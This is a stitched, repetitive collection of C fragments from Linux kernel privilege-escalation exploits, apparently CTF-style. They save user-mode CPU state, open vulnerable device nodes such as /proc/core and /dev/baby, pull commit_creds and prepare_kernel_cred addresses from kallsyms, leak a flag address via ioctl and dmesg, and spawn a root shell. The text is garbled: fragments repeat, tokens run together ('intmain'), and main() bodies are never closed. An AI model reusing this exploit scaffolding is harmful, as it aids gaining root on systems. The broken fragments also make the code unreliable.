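/* Saved user-mode context: code/stack segment selectors, flags and stack pointer. */
size_t user_cs, user_ss, user_rflags, user_sp;

/*
 * Record the current CS, SS, RSP and RFLAGS in the globals above and print a
 * confirmation line.
 *
 * The template is basic asm written destination-first (Intel operand order)
 * and names the C globals directly, so it only assembles when the file is
 * built with GCC's -masm=intel. What later consumes the saved values is not
 * part of this excerpt.
 */
void saveStatus(void)
{
    __asm__("mov user_cs, cs;"      /* code segment selector */
            "mov user_ss, ss;"      /* stack segment selector */
            "mov user_sp, rsp;"     /* stack pointer at this point */
            "pushf;"                /* flags register -> stack ... */
            "pop user_rflags;"      /* ... -> user_rflags */
            );
    puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}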
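/*
 * Check whether the process's real uid is 0 and, if so, start /bin/sh
 * through system(). When getuid() is non-zero the function prints a failure
 * line and terminates the process with exit(-1).
 */
void getRootShell(void)
{
    if (getuid()) {
        printf("\033[31m\033[1m[x] Failed to get the root!\033[0m\n");
        exit(-1);
    }

    printf("\033[32m\033[1m[+] Successful to get the root. Execve root shell now...\033[0m\n");
    system("/bin/sh");
}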
/* Open /proc/core read-write (the literal 2 is the value of O_RDWR on Linux)
 * and stop with exit(-1) when open() fails. */
int fd = open("/proc/core", 2);

if (fd < 0) {
    fputs("\033[31m\033[1m[x] Failed to open the file: /proc/core !\033[0m\n", stdout);
    exit(-1);
}
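/*
 * Scan a kallsyms-format text file ("<hex addr> <type> <name>" per line) for
 * commit_creds and prepare_kernel_cred and store their addresses in the
 * globals of the same names, which are declared outside this excerpt.
 * Assumes /tmp/kallsyms is a readable copy of the symbol table; nothing
 * visible here establishes how it got there.
 */
FILE *sym_table_fd = fopen("/tmp/kallsyms", "r");   /* a FILE * comes from fopen(), not open() */
if (sym_table_fd == NULL) {                         /* failure is NULL, never a negative value */
    printf("\033[31m\033[1m[x] Failed to open the sym_table file!\033[0m\n");
    exit(-1);
}

char buf[0x50], type[0x10];
size_t addr;

/*
 * Demand all three fields on every pass: fscanf() returns EOF, which is
 * non-zero, at end of file, so testing the raw return value never ends the
 * loop. The widths keep %s inside type[0x10] and buf[0x50]; %*[^\n] drops the
 * rest of the line so an over-long name or a trailing "[module]" column does
 * not desynchronise the next read. %zx matches the size_t target.
 */
while (fscanf(sym_table_fd, "%zx%15s%79s%*[^\n]", &addr, type, buf) == 3) {
    if (prepare_kernel_cred && commit_creds)
        break;                                      /* both addresses are known */

    if (!commit_creds && !strcmp(buf, "commit_creds")) {
        commit_creds = addr;
        /* NOTE(review): %llx assumes the global is unsigned long long sized - confirm its declaration */
        printf("\033[32m\033[1m[+] Successful to get the addr of commit_cread:\033[0m%llx\n", commit_creds);
        continue;
    }

    if (!strcmp(buf, "prepare_kernel_cred")) {
        prepare_kernel_cred = addr;
        printf("\033[32m\033[1m[+] Successful to get the addr of prepare_kernel_cred:\033[0m%llx\n", prepare_kernel_cred);
        continue;
    }
}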
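/* Saved user-mode context: code/stack segment selectors, flags and stack pointer. */
size_t user_cs, user_ss, user_rflags, user_sp;

/*
 * Record the current CS, SS, RSP and RFLAGS in the globals above and print a
 * confirmation line.
 *
 * The template is basic asm written destination-first (Intel operand order)
 * and names the C globals directly, so it only assembles when the file is
 * built with GCC's -masm=intel. What later consumes the saved values is not
 * part of this excerpt.
 */
void saveStatus(void)
{
    __asm__("mov user_cs, cs;"      /* code segment selector */
            "mov user_ss, ss;"      /* stack segment selector */
            "mov user_sp, rsp;"     /* stack pointer at this point */
            "pushf;"                /* flags register -> stack ... */
            "pop user_rflags;"      /* ... -> user_rflags */
            );
    puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}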
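/*
 * Check whether the process's real uid is 0 and, if so, start /bin/sh
 * through system(). When getuid() is non-zero the function prints a failure
 * line and terminates the process with exit(-1).
 */
void getRootShell(void)
{
    if (getuid()) {
        printf("\033[31m\033[1m[x] Failed to get the root!\033[0m\n");
        exit(-1);
    }

    printf("\033[32m\033[1m[+] Successful to get the root. Execve root shell now...\033[0m\n");
    system("/bin/sh");
}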
intmain() { printf("\033[34m\033[1m[*] Start to exploit...\033[0m\n"); saveStatus();
/* Open /proc/core read-write (the literal 2 is the value of O_RDWR on Linux)
 * and stop with exit(-1) when open() fails. */
int fd = open("/proc/core", 2);

if (fd < 0) {
    fputs("\033[31m\033[1m[x] Failed to open the file: /proc/core !\033[0m\n", stdout);
    exit(-1);
}

/* Progress marker: the device node was opened. */
puts("\033[34m\033[1m[*] debug1\033[0m");
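/*
 * Scan a kallsyms-format text file ("<hex addr> <type> <name>" per line) for
 * commit_creds and prepare_kernel_cred and store their addresses in the
 * globals of the same names, which are declared outside this excerpt.
 * Assumes /tmp/kallsyms is a readable copy of the symbol table; nothing
 * visible here establishes how it got there.
 */
FILE *sym_table_fd = fopen("/tmp/kallsyms", "r");
if (sym_table_fd == NULL) {                         /* fopen() fails with NULL, never a negative value */
    printf("\033[31m\033[1m[x] Failed to open the sym_table file!\033[0m\n");
    exit(-1);
}
puts("\033[34m\033[1m[*] debug2\033[0m");           /* progress marker: symbol file is open */

char buf[0x50], type[0x10];
size_t addr;

/*
 * Demand all three fields on every pass: fscanf() returns EOF, which is
 * non-zero, at end of file, so testing the raw return value never ends the
 * loop. The widths keep %s inside type[0x10] and buf[0x50]; %*[^\n] drops the
 * rest of the line so an over-long name or a trailing "[module]" column does
 * not desynchronise the next read. %zx matches the size_t target.
 */
while (fscanf(sym_table_fd, "%zx%15s%79s%*[^\n]", &addr, type, buf) == 3) {
    if (prepare_kernel_cred && commit_creds)
        break;                                      /* both addresses are known */

    if (!commit_creds && !strcmp(buf, "commit_creds")) {
        commit_creds = addr;
        /* NOTE(review): %llx assumes the global is unsigned long long sized - confirm its declaration */
        printf("\033[32m\033[1m[+] Successful to get the addr of commit_cread:\033[0m%llx\n", commit_creds);
        continue;
    }

    if (!strcmp(buf, "prepare_kernel_cred")) {
        prepare_kernel_cred = addr;
        printf("\033[32m\033[1m[+] Successful to get the addr of prepare_kernel_cred:\033[0m%llx\n", prepare_kernel_cred);
        continue;
    }
}
puts("\033[34m\033[1m[*] debug3\033[0m");           /* progress marker: scan finished */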
/* Saved user-mode context, filled in by saveStatus(). */
size_t user_cs;
size_t user_ss;
size_t user_rflags;
size_t user_sp;

/*
 * Copy CS, SS, RSP and RFLAGS into the globals above, then print a
 * confirmation line. The asm template is destination-first (Intel operand
 * order), so the file has to be assembled in that dialect, e.g. with GCC's
 * -masm=intel. The consumer of the saved values is outside this excerpt.
 */
void saveStatus()
{
    __asm__(
        "mov user_cs, cs;"          /* code segment selector */
        "mov user_ss, ss;"          /* stack segment selector */
        "mov user_sp, rsp;"         /* current stack pointer */
        "pushf;"                    /* flags register onto the stack ... */
        "pop user_rflags;"          /* ... and off again into user_rflags */
    );

    puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}
/*
 * Start /bin/sh via system() when the real uid is 0; otherwise print a
 * failure line and end the process with exit(-1).
 */
void getRootShell()
{
    if (getuid() == 0) {
        fputs("\033[32m\033[1m[+] Successful to get the root. Execve root shell now...\033[0m\n", stdout);
        system("/bin/sh");
        return;
    }

    fputs("\033[31m\033[1m[x] Failed to get the root!\033[0m\n", stdout);
    exit(-1);
}
int main() { printf("\033[34m\033[1m[*] Start to exploit...\033[0m\n"); saveStatus();
/* Open /proc/core read-write (the literal 2 is the value of O_RDWR on Linux)
 * and stop with exit(-1) when open() fails. */
int fd = open("/proc/core", 2);

if (fd < 0) {
    fputs("\033[31m\033[1m[x] Failed to open the file: /proc/core !\033[0m\n", stdout);
    exit(-1);
}

/* Progress marker: the device node was opened. */
puts("\033[34m\033[1m[*] debug1\033[0m");
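/*
 * Scan a kallsyms-format text file ("<hex addr> <type> <name>" per line) for
 * commit_creds and prepare_kernel_cred and store their addresses in the
 * globals of the same names, which are declared outside this excerpt.
 * Assumes /tmp/kallsyms is a readable copy of the symbol table; nothing
 * visible here establishes how it got there.
 */
FILE *sym_table_fd = fopen("/tmp/kallsyms", "r");
if (sym_table_fd == NULL) {                         /* fopen() fails with NULL, never a negative value */
    printf("\033[31m\033[1m[x] Failed to open the sym_table file!\033[0m\n");
    exit(-1);
}
puts("\033[34m\033[1m[*] debug2\033[0m");           /* progress marker: symbol file is open */

char buf[0x50], type[0x10];
size_t addr;

/*
 * Demand all three fields on every pass: fscanf() returns EOF, which is
 * non-zero, at end of file, so testing the raw return value never ends the
 * loop. The widths keep %s inside type[0x10] and buf[0x50]; %*[^\n] drops the
 * rest of the line so an over-long name or a trailing "[module]" column does
 * not desynchronise the next read. %zx matches the size_t target.
 */
while (fscanf(sym_table_fd, "%zx%15s%79s%*[^\n]", &addr, type, buf) == 3) {
    if (prepare_kernel_cred && commit_creds)
        break;                                      /* both addresses are known */

    if (!commit_creds && !strcmp(buf, "commit_creds")) {
        commit_creds = addr;
        /* NOTE(review): %llx assumes the global is unsigned long long sized - confirm its declaration */
        printf("\033[32m\033[1m[+] Successful to get the addr of commit_cread:\033[0m%llx\n", commit_creds);
        continue;
    }

    if (!strcmp(buf, "prepare_kernel_cred")) {
        prepare_kernel_cred = addr;
        printf("\033[32m\033[1m[+] Successful to get the addr of prepare_kernel_cred:\033[0m%llx\n", prepare_kernel_cred);
        continue;
    }
}
puts("\033[34m\033[1m[*] debug3\033[0m");           /* progress marker: scan finished */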
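/* Saved user-mode context: code/stack segment selectors, flags and stack pointer. */
size_t user_cs, user_ss, user_rflags, user_sp;

/*
 * Record the current CS, SS, RSP and RFLAGS in the globals above and print a
 * confirmation line.
 *
 * The template is basic asm written destination-first (Intel operand order)
 * and names the C globals directly, so it only assembles when the file is
 * built with GCC's -masm=intel. What later consumes the saved values is not
 * part of this excerpt.
 */
void saveStatus(void)
{
    __asm__("mov user_cs, cs;"      /* code segment selector */
            "mov user_ss, ss;"      /* stack segment selector */
            "mov user_sp, rsp;"     /* stack pointer at this point */
            "pushf;"                /* flags register -> stack ... */
            "pop user_rflags;"      /* ... -> user_rflags */
            );
    puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}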
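/*
 * Check whether the process's real uid is 0 and, if so, start /bin/sh
 * through system(). When getuid() is non-zero the function prints a failure
 * line and terminates the process with exit(-1).
 */
void getRootShell(void)
{
    if (getuid()) {
        printf("\033[31m\033[1m[x] Failed to get the root!\033[0m\n");
        exit(-1);
    }

    printf("\033[32m\033[1m[+] Successful to get the root. Execve root shell now...\033[0m\n");
    system("/bin/sh");
}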
intmain() { printf("\033[34m\033[1m[*] Start to exploit...\033[0m\n"); saveStatus();
/* Open /dev/test read-write (the literal 2 is the value of O_RDWR on Linux)
 * and stop with exit(-1) when open() fails. */
int fd = open("/dev/test", 2);

if (fd < 0) {
    fputs("\033[31m\033[1m[x] Failed to open the file: /dev/test !\033[0m\n", stdout);
    exit(-1);
}
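/*
 * Scan a kallsyms-format text file ("<hex addr> <type> <name>" per line) for
 * commit_creds and prepare_kernel_cred and store their addresses in the
 * globals of the same names, which are declared outside this excerpt.
 * Assumes /tmp/kallsyms is a readable copy of the symbol table; nothing
 * visible here establishes how it got there.
 */
FILE *sym_table_fd = fopen("/tmp/kallsyms", "r");
if (sym_table_fd == NULL) {                         /* fopen() fails with NULL, never a negative value */
    printf("\033[31m\033[1m[x] Failed to open the sym_table file!\033[0m\n");
    exit(-1);
}

char buf[0x50], type[0x10];
size_t addr;

/*
 * Demand all three fields on every pass: fscanf() returns EOF, which is
 * non-zero, at end of file, so testing the raw return value never ends the
 * loop. The widths keep %s inside type[0x10] and buf[0x50]; %*[^\n] drops the
 * rest of the line so an over-long name or a trailing "[module]" column does
 * not desynchronise the next read. %zx matches the size_t target.
 */
while (fscanf(sym_table_fd, "%zx%15s%79s%*[^\n]", &addr, type, buf) == 3) {
    if (prepare_kernel_cred && commit_creds)
        break;                                      /* both addresses are known */

    if (!commit_creds && !strcmp(buf, "commit_creds")) {
        commit_creds = addr;
        /* NOTE(review): %llx assumes the global is unsigned long long sized - confirm its declaration */
        printf("\033[32m\033[1m[+] Successful to get the addr of commit_cread:\033[0m%llx\n", commit_creds);
        continue;
    }

    if (!strcmp(buf, "prepare_kernel_cred")) {
        prepare_kernel_cred = addr;
        printf("\033[32m\033[1m[+] Successful to get the addr of prepare_kernel_cred:\033[0m%llx\n", prepare_kernel_cred);
        continue;
    }
}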
int closing; unsignedchar *write_buf; int write_cnt; /* If the tty has a pending do_SAK, queue it here - akpm */ structwork_structSAK_work; structtty_port *port; } __randomize_layout;
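/* Each of a tty's open files has private_data pointing to tty_file_private */
struct tty_file_private {
	struct tty_struct *tty;	/* tty side of the pairing described above */
	struct file *file;	/* open-file side of the pairing */
	struct list_head list;	/* list linkage; the list it belongs to is not shown in this excerpt */
};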
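/* Saved user-mode context: code/stack segment selectors, flags and stack pointer. */
size_t user_cs, user_ss, user_rflags, user_sp;

/*
 * Record the current CS, SS, RSP and RFLAGS in the globals above and print a
 * confirmation line.
 *
 * The template is basic asm written destination-first (Intel operand order)
 * and names the C globals directly, so it only assembles when the file is
 * built with GCC's -masm=intel. What later consumes the saved values is not
 * part of this excerpt.
 */
void saveStatus(void)
{
    __asm__("mov user_cs, cs;"      /* code segment selector */
            "mov user_ss, ss;"      /* stack segment selector */
            "mov user_sp, rsp;"     /* stack pointer at this point */
            "pushf;"                /* flags register -> stack ... */
            "pop user_rflags;"      /* ... -> user_rflags */
            );
    puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}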
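/*
 * Check whether the process's real uid is 0 and, if so, start /bin/sh
 * through system(). When getuid() is non-zero the function prints a failure
 * line and terminates the process with exit(-1).
 */
void getRootShell(void)
{
    if (getuid()) {
        printf("\033[31m\033[1m[x] Failed to get the root!\033[0m\n");
        exit(-1);
    }

    printf("\033[32m\033[1m[+] Successful to get the root. Execve root shell now...\033[0m\n");
    system("/bin/sh");
}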
intmain() { printf("\033[34m\033[1m[*] Start to exploit...\033[0m\n"); saveStatus();
FILE* sym_table_fd = fopen("/proc/kallsyms", "r"); if(sym_table_fd < 0) { printf("\033[31m\033[1m[x] Failed to open the sym_table file!\033[0m\n"); exit(-1); } char buf[0x50], type[0x10]; size_t addr; while(fscanf(sym_table_fd, "%llx%s%s", &addr, type, buf)) { if(prepare_kernel_cred && commit_creds) break; if(!commit_creds && !strcmp(buf, "commit_creds")) { commit_creds = addr; printf("\033[32m\033[1m[+] Successful to get the addr of commit_cread:\033[0m%llx\n", commit_creds); continue; }
intmain() { int fd1 = open("/dev/baby", 2); if(fd1<0) { printf("\033[31m\033[1m[x] Failed to open the file: /dev/baby !\033[0m\n"); exit(-1); }
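/*
 * Issue ioctl request 0x6666 on fd1, copy the kernel-log lines containing
 * "flag" into /tmp/addr, and parse the hexadecimal address that follows
 * "Your flag is at ". The result is stored in flag_addr, which is declared
 * outside this excerpt (as is fd1).
 *
 * NOTE(review): this relies on the kernel log being readable by the calling
 * user. With kernel.dmesg_restrict set, dmesg fails for unprivileged callers
 * and /tmp/addr comes out empty, which ends in the "Not Found" path below.
 */
ioctl(fd1, 0x6666);
system("dmesg | grep flag >/tmp/addr");

int fd2 = open("/tmp/addr", 2);                     /* 2 is the value of O_RDWR on Linux */
if (fd2 < 0) {
    printf("\033[31m\033[1m[x] Failed to open the file: /tmp/addr !\033[0m\n");
    exit(-1);
}

char *temp = malloc(0x200);
if (temp == NULL) {
    perror("malloc");
    exit(-1);
}

/* read() does not NUL-terminate and malloc() memory is uninitialised, so
 * terminate at the byte count actually read before handing it to strstr(). */
ssize_t got = read(fd2, temp, 0x100);
if (got < 0) {
    perror("read");
    exit(-1);
}
temp[got] = '\0';

char *start = strstr(temp, "Your flag is at ");
if (start == 0) {
    printf("[-] Not Found!");
    exit(-1);                                       /* without this, start + 16 below is computed from a null pointer */
}

/* 16 is the length of the marker string. The second argument of strtoull()
 * is an optional char ** end pointer, not a position in the input; NULL lets
 * the conversion stop at the first non-hex character. */
flag_addr = strtoull(start + 16, NULL, 16);
printf("\033[32m\033[1m[+] flag_addr : %p\033[0m\n", (void *)flag_addr);   /* %p expects void * */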